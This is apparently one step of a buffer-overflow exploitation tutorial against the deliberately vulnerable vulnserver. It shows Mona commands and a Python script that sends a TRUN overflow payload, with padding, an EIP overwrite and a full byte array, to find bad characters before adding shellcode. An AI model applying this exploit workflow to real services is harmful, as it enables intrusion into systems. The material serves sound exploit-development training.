Step 4: Finding Bad Characters
badchars
Some programs terminate on certain "bad characters" (badchars) and we want to make sure that our shellcode does not contain any badchar.
Generate badchar list using Mona:
!mona bytearray -cpb "\x00"
The output will be saved as "bytearray.txt" in your working folder. This command also generates a "bytearray.bin" file which we will be using shortly.
Write a script for testing badchars:
#!/usr/bin/python3
import sys, socket
from time import sleep
#--------Changeme--------#
#
host = "192.168.1.2" #
port = 9999 #
#
#------------------------#
# !mona bytearray -cpb "\x00"
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
offset = 2003
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
payload = b""
payload += b"TRUN /.:/"
payload += b"A" * offset # Padding
payload += b"B" * 4 # EIP
payload += badchars
s.send(payload)
s.close()
except:
print("Error connecting to server")
sys.exit()
Run the script and vulnserver crashes. We will use this ESP value to find badchars:

Find badchars using Mona:
!mona compare -f c:\mona\bytearray.bin -a <esp_value>
There is no badchar:

If any badchar is found, delete this badchar from the script and run it again. Repeat this process until all badchars are found.
Last updated
Was this helpful?